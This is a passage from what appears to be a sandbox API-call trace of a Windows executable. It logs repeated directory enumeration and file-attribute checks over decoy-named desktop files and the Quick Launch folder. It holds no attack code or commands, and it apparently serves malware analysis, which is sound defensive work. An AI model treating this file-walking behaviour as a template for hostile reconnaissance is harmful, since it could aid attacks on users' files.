lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7550390, ftCreationTime.dwHighDateTime=0x1d8c0e7, ftLastAccessTime.dwLowDateTime=0x18ae6200, ftLastAccessTime.dwHighDateTime=0x1d8c122, ftLastWriteTime.dwLowDateTime=0x18ae6200, ftLastWriteTime.dwHighDateTime=0x1d8c122, nFileSizeHigh=0x0, nFileSizeLow=0x10ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="365-EMHhBbEoaV.xls", cAlternateFileName="365-EM~1.XLS")) returned 1 [0165.932] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74617be0, ftCreationTime.dwHighDateTime=0x1d8ba52, ftLastAccessTime.dwLowDateTime=0xf4020260, ftLastAccessTime.dwHighDateTime=0x1d8babc, ftLastWriteTime.dwLowDateTime=0xf4020260, ftLastWriteTime.dwHighDateTime=0x1d8babc, nFileSizeHigh=0x0, nFileSizeLow=0x5876, dwReserved0=0x0, dwReserved1=0x0, cFileName="9_1UCT_gbLCquuCVXYa.pps", cAlternateFileName="9_1UCT~1.PPS")) returned 1 [0165.933] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56695d0, ftCreationTime.dwHighDateTime=0x1d8b41d, ftLastAccessTime.dwLowDateTime=0x52fb7940, ftLastAccessTime.dwHighDateTime=0x1d8b590, ftLastWriteTime.dwLowDateTime=0x52fb7940, ftLastWriteTime.dwHighDateTime=0x1d8b590, nFileSizeHigh=0x0, nFileSizeLow=0x3179, dwReserved0=0x0, dwReserved1=0x0, cFileName="AtXm ZuoBVryN 0Sz7j.flv", cAlternateFileName="ATXMZU~1.FLV")) returned 1 [0165.933] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7700a6e0, ftCreationTime.dwHighDateTime=0x1d8bf2b, ftLastAccessTime.dwLowDateTime=0x51736bd0, ftLastAccessTime.dwHighDateTime=0x1d8c0d7, ftLastWriteTime.dwLowDateTime=0x51736bd0, ftLastWriteTime.dwHighDateTime=0x1d8c0d7, nFileSizeHigh=0x0, nFileSizeLow=0x7fa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="auRix1eSdYtBVtnS.wav", cAlternateFileName="AURIX1~1.WAV")) returned 1 [0165.933] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbabaaf0, ftCreationTime.dwHighDateTime=0x1d8b75a, ftLastAccessTime.dwLowDateTime=0x9b506690, ftLastAccessTime.dwHighDateTime=0x1d8bbd7, ftLastWriteTime.dwLowDateTime=0x9b506690, ftLastWriteTime.dwHighDateTime=0x1d8bbd7, nFileSizeHigh=0x0, nFileSizeLow=0x7d92, dwReserved0=0x0, dwReserved1=0x0, cFileName="hjEOx4kiNcHjd22Db-q.pps", cAlternateFileName="HJEOX4~1.PPS")) returned 1 [0165.933] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefaa4e90, ftCreationTime.dwHighDateTime=0x1d8ba9c, ftLastAccessTime.dwLowDateTime=0xe9f50d00, ftLastAccessTime.dwHighDateTime=0x1d8c113, ftLastWriteTime.dwLowDateTime=0xe9f50d00, ftLastWriteTime.dwHighDateTime=0x1d8c113, nFileSizeHigh=0x0, nFileSizeLow=0xd2ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="KIrUs.flv", cAlternateFileName="")) returned 1 [0165.933] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefaa4e90, ftCreationTime.dwHighDateTime=0x1d8ba9c, ftLastAccessTime.dwLowDateTime=0xe9f50d00, ftLastAccessTime.dwHighDateTime=0x1d8c113, ftLastWriteTime.dwLowDateTime=0xe9f50d00, ftLastWriteTime.dwHighDateTime=0x1d8c113, nFileSizeHigh=0x0, nFileSizeLow=0xd2ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="KIrUs.flv", cAlternateFileName="")) returned 0 [0165.933] FindClose (in: hFindFile=0x5bfe278 | out: hFindFile=0x5bfe278) returned 1 [0165.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e204) returned 1 [0165.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e464) returned 1 [0165.933] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22715180, ftCreationTime.dwHighDateTime=0x1d8bcf9, ftLastAccessTime.dwLowDateTime=0x638ca90, ftLastAccessTime.dwHighDateTime=0x1d8be3c, ftLastWriteTime.dwLowDateTime=0x638ca90, ftLastWriteTime.dwHighDateTime=0x1d8be3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.933] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7550390, ftCreationTime.dwHighDateTime=0x1d8c0e7, ftLastAccessTime.dwLowDateTime=0x18ae6200, ftLastAccessTime.dwHighDateTime=0x1d8c122, ftLastWriteTime.dwLowDateTime=0x18ae6200, ftLastWriteTime.dwHighDateTime=0x1d8c122, nFileSizeHigh=0x0, nFileSizeLow=0x10ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="365-EMHhBbEoaV.xls", cAlternateFileName="365-EM~1.XLS")) returned 1 [0165.934] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74617be0, ftCreationTime.dwHighDateTime=0x1d8ba52, ftLastAccessTime.dwLowDateTime=0xf4020260, ftLastAccessTime.dwHighDateTime=0x1d8babc, ftLastWriteTime.dwLowDateTime=0xf4020260, ftLastWriteTime.dwHighDateTime=0x1d8babc, nFileSizeHigh=0x0, nFileSizeLow=0x5876, dwReserved0=0x0, dwReserved1=0x0, cFileName="9_1UCT_gbLCquuCVXYa.pps", cAlternateFileName="9_1UCT~1.PPS")) returned 1 [0165.934] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56695d0, ftCreationTime.dwHighDateTime=0x1d8b41d, ftLastAccessTime.dwLowDateTime=0x52fb7940, ftLastAccessTime.dwHighDateTime=0x1d8b590, ftLastWriteTime.dwLowDateTime=0x52fb7940, ftLastWriteTime.dwHighDateTime=0x1d8b590, nFileSizeHigh=0x0, nFileSizeLow=0x3179, dwReserved0=0x0, dwReserved1=0x0, cFileName="AtXm ZuoBVryN 0Sz7j.flv", cAlternateFileName="ATXMZU~1.FLV")) returned 1 [0165.934] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7700a6e0, ftCreationTime.dwHighDateTime=0x1d8bf2b, ftLastAccessTime.dwLowDateTime=0x51736bd0, ftLastAccessTime.dwHighDateTime=0x1d8c0d7, ftLastWriteTime.dwLowDateTime=0x51736bd0, ftLastWriteTime.dwHighDateTime=0x1d8c0d7, nFileSizeHigh=0x0, nFileSizeLow=0x7fa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="auRix1eSdYtBVtnS.wav", cAlternateFileName="AURIX1~1.WAV")) returned 1 [0165.935] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbabaaf0, ftCreationTime.dwHighDateTime=0x1d8b75a, ftLastAccessTime.dwLowDateTime=0x9b506690, ftLastAccessTime.dwHighDateTime=0x1d8bbd7, ftLastWriteTime.dwLowDateTime=0x9b506690, ftLastWriteTime.dwHighDateTime=0x1d8bbd7, nFileSizeHigh=0x0, nFileSizeLow=0x7d92, dwReserved0=0x0, dwReserved1=0x0, cFileName="hjEOx4kiNcHjd22Db-q.pps", cAlternateFileName="HJEOX4~1.PPS")) returned 1 [0165.935] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefaa4e90, ftCreationTime.dwHighDateTime=0x1d8ba9c, ftLastAccessTime.dwLowDateTime=0xe9f50d00, ftLastAccessTime.dwHighDateTime=0x1d8c113, ftLastWriteTime.dwLowDateTime=0xe9f50d00, ftLastWriteTime.dwHighDateTime=0x1d8c113, nFileSizeHigh=0x0, nFileSizeLow=0xd2ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="KIrUs.flv", cAlternateFileName="")) returned 1 [0165.935] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0165.935] FindClose (in: hFindFile=0x5bfe138 | out: hFindFile=0x5bfe138) returned 1 [0165.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e204) returned 1 [0165.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e464) returned 1 [0165.936] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM\\365-EMHhBbEoaV.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\agsmi4srutuxcdem\\365-emhhbbeoav.xls")) returned 0x20 [0165.936] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM\\9_1UCT_gbLCquuCVXYa.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\agsmi4srutuxcdem\\9_1uct_gblcquucvxya.pps")) returned 0x20 [0165.936] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM\\AtXm ZuoBVryN 0Sz7j.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\agsmi4srutuxcdem\\atxm zuobvryn 0sz7j.flv")) returned 0x20 [0165.936] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM\\auRix1eSdYtBVtnS.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\agsmi4srutuxcdem\\aurix1esdytbvtns.wav")) returned 0x20 [0165.937] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM\\hjEOx4kiNcHjd22Db-q.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\agsmi4srutuxcdem\\hjeox4kinchjd22db-q.pps")) returned 0x20 [0165.937] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM\\KIrUs.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\agsmi4srutuxcdem\\kirus.flv")) returned 0x20 [0165.937] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\DdInwVOUuKHqsE.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\ddinwvouukhqse.png")) returned 0x20 [0165.937] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\n3npesLUr22TVZmq2G.ods" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\n3npeslur22tvzmq2g.ods")) returned 0x20 [0165.937] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\Z510-D-hkuRt.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\z510-d-hkurt.pps")) returned 0x20 [0165.937] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\0KhdgvCwY.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\0khdgvcwy.jpg")) returned 0x20 [0165.938] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5tfgYd 5zBc5i_nbR.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\5tfgyd 5zbc5i_nbr.xls")) returned 0x20 [0165.938] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\7hf9.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\7hf9.wav")) returned 0x20 [0165.938] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\8T4n_1qLOLjxL90.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\8t4n_1qloljxl90.bmp")) returned 0x20 [0165.938] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\BvB-.pptx" (normalized: "c:\\users\\keecfmwgj\\desktop\\bvb-.pptx")) returned 0x20 [0165.939] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\co1l3mz6I3A.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\co1l3mz6i3a.avi")) returned 0x20 [0165.939] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cp1StchTMg.ppt" (normalized: "c:\\users\\keecfmwgj\\desktop\\cp1stchtmg.ppt")) returned 0x20 [0165.939] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cRVv3tpAH5GPO.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\crvv3tpah5gpo.bmp")) returned 0x20 [0165.939] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\d2XMr.rtf" (normalized: "c:\\users\\keecfmwgj\\desktop\\d2xmr.rtf")) returned 0x20 [0165.939] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\dBXn0V8NDoRI1v6t.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\dbxn0v8ndori1v6t.jpg")) returned 0x20 [0165.939] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\desktop\\desktop.ini")) returned 0x26 [0165.940] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Ds26r N.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\ds26r n.swf")) returned 0x20 [0165.940] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\eLYNMAkF_-Jc2al.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\elynmakf_-jc2al.wav")) returned 0x20 [0165.940] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FkRqOLPio4.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\fkrqolpio4.mp4")) returned 0x20 [0165.940] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\j3wu Z087CIq1FGG.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\j3wu z087ciq1fgg.jpg")) returned 0x20 [0165.941] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\k8Z eSPW5awz.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\k8z espw5awz.avi")) returned 0x20 [0165.941] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\n8gErgbitw0kdbzycb.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\n8gergbitw0kdbzycb.png")) returned 0x20 [0165.941] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\njrt9sJ.odt" (normalized: "c:\\users\\keecfmwgj\\desktop\\njrt9sj.odt")) returned 0x20 [0165.941] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\oHD3Y9.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohd3y9.jpg")) returned 0x20 [0165.941] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\out_4.bin.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\out_4.bin.exe")) returned 0x20 [0165.941] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\p sQcfqaLUL4KbJT __4.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\p sqcfqalul4kbjt __4.mp3")) returned 0x20 [0165.942] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\p8mE06ilb_q.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\p8me06ilb_q.png")) returned 0x20 [0165.942] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\s8ohLOQq4wxVIuURP30V.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\s8ohloqq4wxviuurp30v.mp3")) returned 0x20 [0165.944] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\_uyDWF2R_p-YxX_WKj8k.ots" (normalized: "c:\\users\\keecfmwgj\\desktop\\_uydwf2r_p-yxx_wkj8k.ots")) returned 0x20 [0165.948] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch")) returned 0x11 [0165.949] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch")) returned 0x11 [0165.949] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0165.949] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", nBufferLength=0x4c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpFilePart=0x0) returned 0x4b [0165.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e548) returned 1 [0165.950] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0165.950] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", nBufferLength=0x4c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpFilePart=0x0) returned 0x4b [0165.950] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\*"), lpFindFileData=0x5a0e2f8 | out: lpFindFileData=0x5a0e2f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe138 [0165.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e548) returned 1 [0165.950] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0165.950] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", nBufferLength=0x4c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpFilePart=0x0) returned 0x4b [0165.951] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\*"), lpFindFileData=0x5a0e2f8 | out: lpFindFileData=0x5a0e2f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe278 [0165.951] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.951] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.951] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d24b360, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x5a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Launch Internet Explorer Browser.lnk", cAlternateFileName="LAUNCH~1.LNK")) returned 1 [0165.951] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5021c250, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5021c250, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x502423b0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0165.951] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0165.951] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0165.951] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0165.951] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0165.952] FindClose (in: hFindFile=0x5bfe138 | out: hFindFile=0x5bfe138) returned 1 [0165.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e304) returned 1 [0165.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e564) returned 1 [0165.952] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.952] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.952] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d24b360, ftCreationTime.dwHighDateTime=0x1d7b064, 